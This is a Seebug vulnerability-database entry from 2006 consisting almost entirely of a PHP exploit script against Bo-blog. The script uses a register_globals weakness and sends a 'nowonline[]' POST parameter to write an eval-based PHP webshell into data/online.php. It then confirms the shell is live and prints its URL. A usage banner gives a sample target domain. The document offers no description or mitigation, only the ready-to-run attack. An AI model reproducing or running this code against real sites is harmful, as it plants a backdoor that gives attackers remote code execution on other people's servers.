Exploit For Last Bo-blog version

2006-12-10T00:00:00
ID SSV:5804
Type seebug
Reporter Root
Modified 2006-12-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                <?
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);


$data    ='nowonline[]=<?php @eval($_REQUEST[orz]);echo orz;die();?>&1468108794=orz&-1844564458=orz';
$server    =$argv[1];
$sitepath  =$argv[2];


if($argc!=3){
  hr();
  echo"  Uaget: boblog.php www.defence80.com /blog/\r\n";
  echo"  We Are ScriptKiz....\r\n";
  hr();
  ver();
  exit;
}


echo "\r\nExploit For Bo-blog Last Version \r\n";
echo "Need Register Globals = On\r\n";
echo "\r\n";


preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send("",'index.php'),$php);
echo "We Got php version:\t".$php[1]."\r\n";

function send($cmd,$script)
{
global $sitepath,$server,$cookie,$count;


$path =$sitepath.$script;
$count=$count+1;
$message = "POST ".$path." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

//echo $message;
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="</-_->";
//echo $resp;
return $resp;
}


echo "Exploiting:\t\t............\r\n";
$response=send($data,'index.php');


$data='';
$response=send($data,'data/online.php');
if(strstr($response,'orz')) {
  echo "We Got Webshell:\thttp://$server$path/data/online.php\r\n";
  echo "For Fun :)";
  }
else die("Exploit Failed!\r\n");

function ver(){
  //版本信息,排列格式花了不少时间啊, - -|||
   echo"  +-------------------+        +-------------------+\r\n";
   echo"  +-www.loveshell.net-+   o'(-_-)'o    +--  danger??? --+\r\n";
   echo"  +-------------------+  啊?你说不怕火星人啊?  +-------------------+\r\n";
   hr();
}

function hr(){
  echo"  +-------------------------------------------------------------------+\r\n";
}

?>